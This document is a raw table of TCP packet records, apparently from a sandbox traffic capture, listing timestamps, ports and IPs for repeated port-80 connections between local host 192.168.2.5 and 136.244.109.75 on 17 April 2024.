Apr 17, 2024 03:17:21.904154062 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904191017 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904195070 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:21.904230118 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904268026 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904269934 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:21.904308081 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904346943 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.107786894 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.113225937 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.113265991 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.113296986 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.127505064 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.127557039 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.127588987 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.141849041 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.141892910 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.142014980 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.156307936 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.156483889 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.282834053 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.421792984 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.630315065 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.630422115 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.632421017 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:22.840774059 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:22.840864897 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.049376011 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.789892912 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.789954901 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.789995909 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790025949 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790035963 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790076017 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790081978 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790093899 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790116072 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790124893 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790159941 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790165901 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790198088 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790205956 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790235996 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790241957 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790277004 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.790283918 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.790322065 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.930608988 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.998831034 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.998894930 CEST	80	49732	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:23.998909950 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:23.998949051 CEST	49732	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:24.134727001 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:24.134840012 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:24.136610985 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:24.340329885 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:24.340434074 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:24.544051886 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303402901 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303467035 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303505898 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303550005 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303592920 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303631067 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303647995 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303647995 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303647995 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303647995 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303669930 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303711891 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303730965 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303730965 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303750992 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303756952 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303792953 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.303797007 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.303849936 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.445544958 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.507715940 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.507781029 CEST	80	49733	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.507827044 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.507916927 CEST	49733	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.653796911 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.653918028 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.655731916 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:25.863924980 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:25.864007950 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.072202921 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.812987089 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813050985 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813088894 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813127995 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813133001 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813167095 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813177109 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813206911 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813220024 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813245058 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813258886 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813287973 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813288927 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813327074 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813333988 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813365936 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:26.813373089 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.813410044 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:26.952822924 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:27.021580935 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:27.021647930 CEST	80	49734	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:27.021848917 CEST	49734	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:27.156733990 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:27.156982899 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:27.158634901 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:27.362411022 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:27.362607956 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:27.566116095 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.322999954 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323060989 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323101044 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323139906 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323180914 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323218107 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323257923 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323297024 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323335886 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323379040 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.323391914 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.323482037 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.323482037 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.323482037 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.323482037 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.323482037 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.455547094 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.527199984 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.527267933 CEST	80	49735	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.527404070 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.527404070 CEST	49735	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.659086943 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.659387112 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.661124945 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:28.864737034 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:28.864821911 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.068408966 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769164085 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769228935 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769268990 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769309998 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769309044 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769352913 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769387007 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769392967 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769387960 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769427061 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769438028 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769443989 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769483089 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769490957 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769526958 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.769539118 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769572020 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.769985914 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.770040035 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.923018932 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.973365068 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.973434925 CEST	80	49736	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:29.973486900 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:29.973488092 CEST	49736	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:30.126444101 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:30.126540899 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:30.128575087 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:30.331896067 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:30.332182884 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:30.535487890 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356720924 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356765985 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356803894 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356844902 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356842995 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.356888056 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356920004 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.356920004 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.356930971 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356950045 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.356973886 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.356975079 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.357012987 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.357017994 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.357052088 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.357059002 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.357089043 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.357105970 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.357131958 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.500117064 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.561458111 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.561528921 CEST	80	49737	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.561559916 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.561599970 CEST	49737	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.708877087 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.709335089 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.711087942 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:31.919308901 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:31.919425011 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.127906084 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866765022 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866831064 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866868973 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866890907 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.866905928 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866946936 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.866946936 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866964102 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.866987944 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.866998911 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.867031097 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.867036104 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.867070913 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.867074966 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.867110014 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.867114067 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.867151976 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:32.867152929 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:32.867194891 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.020282030 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.075552940 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:33.075668097 CEST	80	49738	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:33.075710058 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.075740099 CEST	49738	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.228377104 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:33.228496075 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.230597973 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.438450098 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:33.438812017 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:33.646197081 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415122032 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415174961 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415191889 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415225029 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415246964 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415265083 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415285110 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.415297985 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415318012 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415337086 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415358067 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.415369987 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.415369987 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.415369987 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.415400028 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.415446043 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.546118975 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.622677088 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.622745991 CEST	80	49739	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.622777939 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.622865915 CEST	49739	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.752068043 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.752414942 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.754471064 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:34.958175898 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:34.958280087 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.161988974 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881505966 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881575108 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881664991 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881689072 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881704092 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881743908 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881748915 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881758928 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881783962 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881798983 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881824970 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881831884 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881865025 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881870031 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881903887 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881908894 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881944895 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:35.881947041 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:35.881988049 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.019994974 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.085498095 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:36.085577965 CEST	80	49740	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:36.085607052 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.085628986 CEST	49740	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.228302002 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:36.228549004 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.230211020 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.438381910 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:36.438620090 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:36.646949053 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412234068 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412298918 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412337065 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412374973 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412411928 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412450075 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412491083 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412499905 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.412528038 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412564993 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.412570000 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412584066 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.412610054 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.412658930 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.412658930 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.573972940 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.620672941 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.620735884 CEST	80	49741	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.620964050 CEST	49741	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.783004045 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:37.783281088 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:37.986052990 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:38.194725037 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:38.194777012 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:38.403476000 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132791042 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132837057 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132874966 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132913113 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132910967 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.132955074 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.132981062 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.132993937 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.133033991 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.133049965 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.133074045 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.133114100 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.133136988 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.133152962 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.133208036 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.333132982 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.341870070 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.341964006 CEST	49742	80	192.168.2.5	136.244.109.75
